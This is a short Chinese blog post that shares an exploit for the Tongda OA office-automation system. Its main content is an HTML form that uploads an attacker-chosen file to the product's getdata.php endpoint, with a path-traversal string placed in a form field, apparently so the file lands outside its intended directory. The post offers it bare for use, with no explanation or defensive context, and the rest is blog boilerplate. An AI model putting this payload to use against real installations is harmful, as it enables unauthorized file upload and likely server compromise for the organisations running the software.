通达OA最新漏洞利用EXP分享

作者:小俊 分类: WEB漏洞大全 发布于:2020-2-28 23:02 ė596次浏览 60条评论

直接上exp。

EXP:

<html> <head> </head> <body> <table width="80%" border="0" align="center"> <form name="form1" method="post" action="http://127.0.0.1//pda/apps/report/getdata.php" enctype="multipart/form-data"> <tr> <td align="center"><input name="ATTACHMENT" type="file" id="upfile"></td> <td align="center"><input name="type" type="text" value="addfile"></td> <td align="center"><input name="other" type="text" value="}/../../../../{22"></td> </tr> <tr> <td align="center"><input type="submit" name="Submit" value="上传图片"></td> </tr> </form> </table> </body>

本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部